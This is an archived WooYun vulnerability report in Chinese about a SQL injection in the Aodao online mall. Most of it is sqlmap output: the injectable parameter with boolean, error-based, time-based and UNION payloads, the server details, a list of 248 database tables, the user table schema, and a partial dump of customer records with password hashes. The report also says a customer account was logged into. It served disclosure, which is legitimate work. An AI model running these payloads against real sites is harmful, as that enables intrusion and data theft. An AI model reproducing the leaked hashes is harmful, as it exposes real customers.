乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-11: 细节已通知厂商并且等待厂商处理中 2016-01-15: 厂商已经确认,细节仅向厂商公开 2016-01-25: 细节向核心白帽子及相关领域专家公开 2016-02-04: 细节向普通白帽子公开 2016-02-14: 细节向实习白帽子公开 2016-02-27: 细节向公众公开
购物网澳道商城(http://www.auzzieoutdoors.cn/index.html)存在sql注入泄露用户数据(26797条数据)。用户信息可登陆。同时可注出管理员信息;
1、注入点:
http://**.**.**.**/brands/oe/category?cid=287
sqlmap resumed the following injection point(s) from stored session:---Parameter: cid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cid=287) AND 7546=7546 AND (4466=4466 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: cid=287) AND (SELECT 1891 FROM(SELECT COUNT(*),CONCAT(0x7176717671,(SELECT (ELT(1891=1891,1))),0x71787a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1509=1509 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: cid=287) AND (SELECT * FROM (SELECT(SLEEP(5)))DGIb) AND (7616=7616 Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: cid=287) UNION ALL SELECT NULL,CONCAT(0x7176717671,0x706a43554b747a704c74,0x71787a7671),NULL,NULL,NULL-----[09:41:15] [INFO] the back-end DBMS is MySQLweb server operating system: Linux CentOS 6.5web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5.0
2、所有数据库:
available databases [2]:[*] information_schema[*] **.**.**.**
3、**.**.**.**库中的表:
Database: **.**.**.**[248 tables]+---------------------------------------+| aodao_account_log || aodao_ad || aodao_ad_custom || aodao_ad_position || aodao_admin_action || aodao_admin_log || aodao_admin_message || aodao_admin_user || aodao_adsense || aodao_advice || aodao_affiliate_log || aodao_agency || aodao_area_region || aodao_article || aodao_article_cat || aodao_attribute || aodao_attribute_sorting || aodao_auction_log || aodao_auto_manage || aodao_back_goods || aodao_back_order || aodao_bonus_type || aodao_booking_goods || aodao_brand || aodao_brand_banner || aodao_brand_cat_goods || aodao_brand_nav || aodao_card || aodao_cart || aodao_cat_goods_order || aodao_cat_recommend || aodao_category || aodao_collect_goods || aodao_comment || aodao_crons || aodao_delivery_goods || aodao_delivery_order || aodao_email_list || aodao_email_sendlist || aodao_error_log || aodao_exchange_goods || aodao_favourable_activity || aodao_feedback || aodao_friend_link || aodao_goods || aodao_goods_activity || aodao_goods_article || aodao_goods_attr || aodao_goods_cat || aodao_goods_gallery || aodao_goods_type || aodao_group_goods || aodao_keywords || aodao_link_goods || aodao_mail_templates || aodao_media || aodao_member_price || aodao_nav || aodao_oms_inventorystock || aodao_oms_log || aodao_order_action || aodao_order_goods || aodao_order_info || aodao_pack || aodao_package_goods || aodao_pay_log || aodao_pay_points || aodao_payment || aodao_photo || aodao_photo_like || aodao_photo_review || aodao_plugins || aodao_products || aodao_promote || aodao_promote_order || aodao_promote_pic || aodao_reg_extend_info || aodao_reg_fields || aodao_region || aodao_region_bak2 || aodao_role || aodao_searchengine || aodao_series || aodao_sessions || aodao_sessions_data || aodao_shipping || aodao_shipping_area || aodao_shop_config || aodao_snatch_log || aodao_stats || aodao_suppliers || aodao_syncoms_order || aodao_tag || aodao_template || aodao_topic || aodao_user_account || aodao_user_address || aodao_user_bonus || aodao_user_bonus_log || aodao_user_feed || aodao_user_rank || aodao_users || aodao_virtual_card || aodao_volume_price || aodao_vote || aodao_vote_log || aodao_vote_option || aodao_wholesale || blogaodao_blog_versions || blogaodao_blogs || blogaodao_commentmeta || blogaodao_comments || blogaodao_huge_itportfolio_images || blogaodao_huge_itportfolio_portfolios || blogaodao_links || blogaodao_nextend_smartslider_layouts || blogaodao_nextend_smartslider_sliders || blogaodao_nextend_smartslider_slides || blogaodao_nextend_smartslider_storage || blogaodao_options || blogaodao_postmeta || blogaodao_posts || blogaodao_registration_log || blogaodao_signups || blogaodao_site || blogaodao_sitemeta || blogaodao_term_relationships || blogaodao_term_taxonomy || blogaodao_terms || blogaodao_usermeta || blogaodao_users || blogaodao_visitor_maps_ge || blogaodao_visitor_maps_st || blogaodao_visitor_maps_wo || blogaodao_wysija_campaign || blogaodao_wysija_campaign_list || blogaodao_wysija_custom_field || blogaodao_wysija_email || blogaodao_wysija_email_user_stat || blogaodao_wysija_email_user_url || blogaodao_wysija_form || blogaodao_wysija_list || blogaodao_wysija_queue || blogaodao_wysija_url || blogaodao_wysija_url_mail || blogaodao_wysija_user || blogaodao_wysija_user_field || blogaodao_wysija_user_history || blogaodao_wysija_user_list || ecs_account_log || ecs_ad || ecs_ad_custom || ecs_ad_position || ecs_admin_action || ecs_admin_log || ecs_admin_message || ecs_admin_user || ecs_adsense || ecs_affiliate_log || ecs_agency || ecs_area_region || ecs_article || ecs_article_cat || ecs_attribute || ecs_auction_log || ecs_auto_manage || ecs_back_goods || ecs_back_order || ecs_bonus_type || ecs_booking_goods || ecs_brand || ecs_card || ecs_cart || ecs_cat_recommend || ecs_category || ecs_collect_goods || ecs_comment || ecs_crons || ecs_delivery_goods || ecs_delivery_order || ecs_email_list || ecs_email_sendlist || ecs_error_log || ecs_exchange_goods || ecs_favourable_activity || ecs_feedback || ecs_friend_link || ecs_goods || ecs_goods_activity || ecs_goods_article || ecs_goods_attr || ecs_goods_cat || ecs_goods_gallery || ecs_goods_type || ecs_group_goods || ecs_keywords || ecs_link_goods || ecs_mail_templates || ecs_member_price || ecs_nav || ecs_order_action || ecs_order_goods || ecs_order_info || ecs_pack || ecs_package_goods || ecs_pay_log || ecs_payment || ecs_plugins || ecs_products || ecs_reg_extend_info || ecs_reg_fields || ecs_region || ecs_role || ecs_searchengine || ecs_sessions || ecs_sessions_data || ecs_shipping || ecs_shipping_area || ecs_shop_config || ecs_snatch_log || ecs_stats || ecs_suppliers || ecs_tag || ecs_template || ecs_topic || ecs_user_account || ecs_user_address || ecs_user_bonus || ecs_user_feed || ecs_user_rank || ecs_users || ecs_virtual_card || ecs_volume_price || ecs_vote || ecs_vote_log || ecs_vote_option || ecs_wholesale || wp_commentmeta || wp_comments || wp_links || wp_options || wp_postmeta || wp_posts || wp_term_relationships || wp_term_taxonomy || wp_terms || wp_usermeta || wp_users |+---------------------------------------+
4、用户表aodao_users中的字段:
Database: **.**.**.**Table: aodao_users[38 columns]+-----------------+------------------------+| Column | Type |+-----------------+------------------------+| address_id | mediumint(8) unsigned || aite_id | text || alias | varchar(60) || answer | varchar(255) || birthday | date || credit_line | decimal(10,2) unsigned || ec_salt | varchar(10) || email | varchar(60) || flag | tinyint(3) unsigned || frozen_money | decimal(10,2) || home_phone | varchar(20) || is_special | tinyint(3) unsigned || is_validated | tinyint(3) unsigned || last_ip | varchar(15) || last_login | int(11) unsigned || last_time | datetime || ltinfo | varchar(255) || mobile_phone | varchar(20) || msn | varchar(60) || office_phone | varchar(20) || openid | varchar(32) || parent_id | mediumint(9) || passwd_answer | varchar(255) || passwd_question | varchar(50) || password | varchar(32) || pay_points | int(10) unsigned || qq | varchar(20) || question | varchar(255) || rank_points | int(10) unsigned || reg_source | varchar(32) || reg_time | int(10) unsigned || salt | varchar(10) || sex | tinyint(1) unsigned || user_id | mediumint(8) unsigned || user_money | decimal(10,2) || user_name | varchar(60) || user_rank | tinyint(3) unsigned || visit_count | smallint(5) unsigned |+-----------------+------------------------+
5、user_name,password,mobile_phone,email,sex字段的数据(部分数据):
Database: **.**.**.**Table: aodao_users[26797 entries]+-----------------------------------------+---------------------------------------------------------------+----------------------------------+------------------------------------+-------------------------+------------+| user_name | password | mobile_phone | email | sex | birthday |+-----------------------------------------+---------------------------------------------------------------+----------------------------------+------------------------------------+-------------------------+------------+[08:46:17] [WARNING] console output will be trimmed to last 256 rows due to large table size| F3A23D150C2156B4475F756F54A3197A@**.**.**.** | 69b0a928cd722a6b3e42a9a3c0334054 | <blank> | <blank> | 0 | 0000-00-00 || 9A5A195077D30DB6E8FBFDF696027DCC@**.**.**.** | 575c4facfd099cd9dcfc35d416c9cca3 | <blank> | <blank> | 0 | 0000-00-00 || 56251E60C71A463BEADE55D899E4EB90@**.**.**.** | 186df3259b54743f12f2f179f81fd493 | <blank> | <blank> | 0 | 0000-00-00 || 8764169D4D854038A4A9CADE8B36A1E4@**.**.**.** | dfec10e9a881c372715a09ee071ce0a1 | <blank> | <blank> | 0 | 0000-00-00 || 2AE0604195C08F80B92EF051087FA246@**.**.**.** | be3c8967b7b434b42e5e63e82bf2c94f | <blank> | <blank> | 0 | 0000-00-00 || BA7D878154C5D5EF514CB8709A0F6B1B@**.**.**.** | f40dc51fe6646ffe3bd14061c6c73d42 | <blank> | <blank> | 0 | 0000-00-00 || 01FE08BD834B6B96C84FEACA8170D12C@**.**.**.** | 3a10405dc50978f45b1a6ab681624591 | <blank> | <blank> | 0 | 0000-00-00 || 4F4EA3D2F2BFE9CD24C4A2D049D17F42@**.**.**.** | bee66989db78c2e8871ca4df7649b278 | <blank> | <blank> | 0 | 0000-00-00 || 7D7BB307CE0DC3AE3126CDBA3520C545@**.**.**.** | 37d639646aa49b03df1009a79dd65683 | <blank> | <blank> | 0 | 0000-00-00 || 04819E2610335787FD458D89F05005A7@**.**.**.** | 433a654e6e4f773ec2eefcce7d1fe0d8 | <blank> | <blank> | 0 | 0000-00-00 || 505065ADBBEDE5C50CB3D11608A63504@**.**.**.** | d7fd50965380c0daa2b3714589eea677 | <blank> | <blank> | 0 | 0000-00-00 || 0BD6D86E2382BABB2C687CC72E764C0D@**.**.**.** | 5ed2c4ad1bfd3f24d6d98f020cb2282f | <blank> | <blank> | 0 | 0000-00-00 || 5EC8C8261FC1B90C376ADB7FC3B705E4@**.**.**.** | 339024fd1a43a5d27e8601a43447081c | <blank> | <blank> | 0 | 0000-00-00 || 94FF225E7C42F58A6FB0E744EA7B543A@**.**.**.** | 25bdb072beb0ac49c403bd2d358a8d48 | <blank> | <blank> | 0 | 0000-00-00 || 46CABB8DFBC7E80E7D525EDD7CE00B09@**.**.**.** | 9d945f8152345588ed56032039974152
6、随意找个用户登录一下:
7、管理员用户信息:
8、密码没破出来。
参数过滤
危害等级:中
漏洞Rank:9
确认时间:2016-01-15 15:33
CNVD未直接复现所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。
暂无